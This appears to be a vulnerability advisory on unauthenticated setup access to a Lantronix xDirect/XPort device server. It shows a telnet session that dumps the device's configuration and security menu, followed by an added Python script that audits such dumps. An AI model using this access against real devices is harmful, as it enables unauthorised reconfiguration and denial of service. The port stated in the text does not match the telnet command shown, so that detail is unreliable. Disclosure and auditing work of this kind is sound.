Lantronix xDirect Serial-to-Ethernet Server / XPort Unauthenticated Access

The Lantronix xDirect Serial-to-Ethernet device server allows unauthenticated access to TCP port 9999. This lets an attacker configure the device, gain information about its services and disable them, resulting in a denial of service. The device tested was running XPort 6.6.0.2.

df:/tmp/ # telnet 192.168.1.10
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.

MAC address 00204AC975EE
Software version V6.6.0.2 (080926) XPTEXE

Press Enter for Setup Mode

*** basic parameters
Hardware: Ethernet TPI
IP addr 192.168.1.10, gateway 192.168.1.1,netmask 255.255.255.0
DNS Server not set

*** Security
SNMP is enabled
SNMP Community Name: public
Telnet Setup is enabled
TFTP Download is enabled
Port 77FEh is enabled
Web Server is enabled
Web Setup is enabled
ECHO is disabled
Enhanced Password is disabled
Port 77F0h is enabled

*** Channel 1
Baudrate 38400, I/F Mode 4C, Flow 00
Port 10001
Connect Mode : C0
Send '+++' in Modem Mode enabled
Show IP addr after 'RING' enabled
Auto increment source port disabled
Remote IP Adr: --- none ---, Port 00000
Disconn Mode : 00
Flush Mode : 00

*** Expert
TCP Keepalive : 45s
ARP cache timeout: 600s
CPU performance: Regular
Monitor Mode @ bootup : enabled
RS485 tx enable : active low
HTTP Port Number : 80
SMTP Port Number : 25
MTU Size: 1400
Alternate MAC: disabled
Ethernet connection type: auto-negotiate

*** E-mail
Mail server: 0.0.0.0
Unit :
Domain :
Recipient 1:
Recipient 2:

– Trigger 1
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

– Trigger 2
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

– Trigger 3
Serial trigger input: disabled
Channel: 1
Match: 00,00
Trigger input1: X
Trigger input2: X
Trigger input3: X
Message :
Priority: L
Min. notification interval: 1 s
Re-notification interval : 0 s

Change Setup:
0 Server
1 Channel 1
3 E-mail
5 Expert
6 Security
7 Defaults
8 Exit without save
9 Save and exit Your choice ? 6

Disable SNMP (N) ?

SNMP Community Name (public):

Disable Telnet Setup (N) ?

Disable TFTP Firmware Update (N) ?

Disable Port 77FEh (N) ?

Disable Web Server (N) ?

Disable Web Setup (N) ?

Disable ECHO ports (Y) ?

Enable Enhanced Password (N) ?

Disable Port 77F0h (N) ?

Change Setup:
0 Server
1 Channel 1
3 E-mail
5 Expert
6 Security
7 Defaults
8 Exit without save
9 Save and exit Your choice ? 8

exiting without save !
Connection closed by foreign host.
df:/tmp/ #
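
For anyone auditing these units, the "*** Security" block of a saved setup-mode dump can be checked against a baseline. The following is an added example, not part of the original post; the baseline in EXPECTED and the function names are assumptions made for illustration.

```python
import re

# Constructed sample: part of the setup-mode dump from the session above.
SAMPLE = """\
Software version V6.6.0.2 (080926) XPTEXE

*** Security
SNMP is enabled
SNMP Community Name: public
Telnet Setup is enabled
TFTP Download is enabled
Port 77FEh is enabled
Web Server is enabled
Web Setup is enabled
ECHO is disabled
Enhanced Password is disabled
Port 77F0h is enabled

*** Channel 1
Port 10001
"""

# Assumed baseline for this example (not a vendor recommendation):
# every listed service off, Enhanced Password on.
EXPECTED = {"SNMP": "disabled", "Telnet Setup": "disabled",
            "TFTP Download": "disabled", "Port 77FEh": "disabled",
            "Web Server": "disabled", "Web Setup": "disabled",
            "ECHO": "disabled", "Port 77F0h": "disabled",
            "Enhanced Password": "enabled"}

def parse_security(dump):
    """Return {setting: value} for the '*** Security' section only."""
    settings, in_section = {}, False
    for line in (l.strip() for l in dump.splitlines()):
        if line.startswith("***"):
            in_section = line.lower() == "*** security"
        elif in_section and line:
            m = re.fullmatch(r"(.+?)\s+is\s+(enabled|disabled)", line)
            if m:
                settings[m.group(1)] = m.group(2)
            elif ":" in line:
                key, value = line.split(":", 1)
                settings[key.strip()] = value.strip()
    return settings

def audit(dump):
    """List every setting that deviates from EXPECTED, plus a default community."""
    found = parse_security(dump)
    issues = [f"{k} is {found[k]}" for k, want in EXPECTED.items()
              if k in found and found[k] != want]
    if found.get("SNMP Community Name") == "public":
        issues.append("SNMP Community Name is public")
    return issues
```

Run over the dump shown in this post, audit() reports every management service left on, the disabled Enhanced Password and the default SNMP community.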
